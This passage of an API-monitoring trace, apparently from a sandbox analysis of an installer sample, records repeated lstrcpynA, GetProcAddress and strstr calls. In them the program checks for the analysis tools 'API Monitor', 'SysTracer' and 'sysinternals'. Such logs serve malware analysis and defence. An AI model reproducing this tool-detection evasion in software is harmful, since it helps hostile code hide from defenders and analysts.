returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.527] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.527] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.527] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.527] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.527] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.527] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.528] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.528] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.528] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.528] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.528] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.528] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.528] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.528] lstrcpynA (in: lpString1=0x341200, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.528] lstrcpynA (in: lpString1=0x3401e0, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.528] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.528] strstr (_Str="", _SubStr="API Monitor") returned 0x0 [0158.528] lstrcpynA (in: lpString1=0x341200, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.528] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.528] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.528] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.528] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.529] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.529] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.529] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.529] lstrlenA (lpString="0") returned 1 [0158.529] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.529] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.529] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.529] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.529] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.529] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.529] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.529] lstrlenA (lpString="0") returned 1 [0158.529] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.529] lstrlenA (lpString="") returned 0 [0158.529] lstrcpynA (in: lpString1=0x33723c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.529] lstrcpynA (in: lpString1=0x337684, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.529] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.529] lstrlenA (lpString="3399936") returned 7 [0158.529] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.529] lstrcpynA (in: lpString1=0x40a418, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.529] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.529] lstrcpynA (in: lpString1=0x337acc, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.529] lstrcpynA (in: lpString1=0x432800, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.529] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.529] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.529] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.529] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.529] lstrlenA (lpString="") returned 0 [0158.529] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.529] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.529] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.530] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.530] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.530] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.530] lstrlenA (lpString="") returned 0 [0158.530] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.530] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.530] lstrlenA (lpString="") returned 0 [0158.530] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.530] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.530] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.530] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.530] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.530] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.530] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.530] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.530] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.530] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.530] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.530] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.530] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.530] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.531] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.531] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.531] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.531] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.531] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.531] lstrcpynA (in: lpString1=0x340df8, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.531] lstrcpynA (in: lpString1=0x3401e0, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.531] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.531] strstr (_Str="", _SubStr="Blue Project Software SysTracer") returned 0x0 [0158.531] lstrcpynA (in: lpString1=0x340df8, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.531] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.531] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.531] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.531] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.531] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.531] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.531] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.531] lstrlenA (lpString="0") returned 1 [0158.531] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.531] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.531] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.531] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.531] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.532] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.532] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.532] lstrlenA (lpString="0") returned 1 [0158.532] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.532] lstrlenA (lpString="") returned 0 [0158.532] lstrcpynA (in: lpString1=0x33723c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.532] lstrcpynA (in: lpString1=0x337684, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.532] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.532] lstrlenA (lpString="3399936") returned 7 [0158.532] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.532] lstrcpynA (in: lpString1=0x40a418, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.532] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.532] lstrcpynA (in: lpString1=0x337acc, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.532] lstrcpynA (in: lpString1=0x432800, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.532] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.532] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.532] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.532] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.532] lstrlenA (lpString="") returned 0 [0158.532] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.532] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.532] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.532] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.532] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.532] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.532] lstrlenA (lpString="") returned 0 [0158.532] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.532] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.532] lstrlenA (lpString="") returned 0 [0158.533] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.533] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.533] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.533] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.533] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.533] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.533] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.533] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.533] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.533] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.533] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.533] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.533] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.534] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.534] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.534] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.534] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.534] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.534] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.534] lstrcpynA (in: lpString1=0x341200, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.534] lstrcpynA (in: lpString1=0x3401e0, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.534] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.534] strstr (_Str="", _SubStr="sysinternals") returned 0x0 [0158.534] lstrcpynA (in: lpString1=0x341200, lpString2="sysinternals", iMaxLength=1024 | out: lpString1="sysinternals") returned="sysinternals" [0158.534] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.534] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.534] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.534] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.535] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.535] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.535] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.535] lstrlenA (lpString="0") returned 1 [0158.535] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.535] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.535] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.535] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.535] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.535] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.535] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.535] lstrlenA (lpString="0") returned 1 [0158.535] lstrcpynA (in: lpString1=0x33723c, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0158.535] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.535] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.535] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.535] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.535] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.535] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.535] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.536] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.536] lstrlenA (lpString="3399936") returned 7 [0158.536] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.536] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.536] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.536] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.536] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.536] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.536] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.536] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.536] wsprintfA (in: param_1=0x18f784, param_2="callback%d" | out: param_1="callback1") returned 9 [0158.536] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.537] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="65714") returned 5 [0158.537] lstrcpyA (in: lpString1=0x430400, lpString2="65714" | out: lpString1="65714") returned="65714" [0158.537] lstrcpynA (in: lpString1=0x340df8, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.537] lstrcpynA (in: lpString1=0x33723c, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.537] lstrcpynA (in: lpString1=0x430000, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.537] lstrcpynA (in: lpString1=0x42e3a0, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.537] lstrlenA (lpString="callback1") returned 9 [0158.537] lstrcpynA (in: lpString1=0x40ac18, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.537] lstrcpynA (in: lpString1=0x40b018, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.537] lstrcmpiA (lpString1="callback1", lpString2="callback1") returned 0 [0158.537] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.537] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: 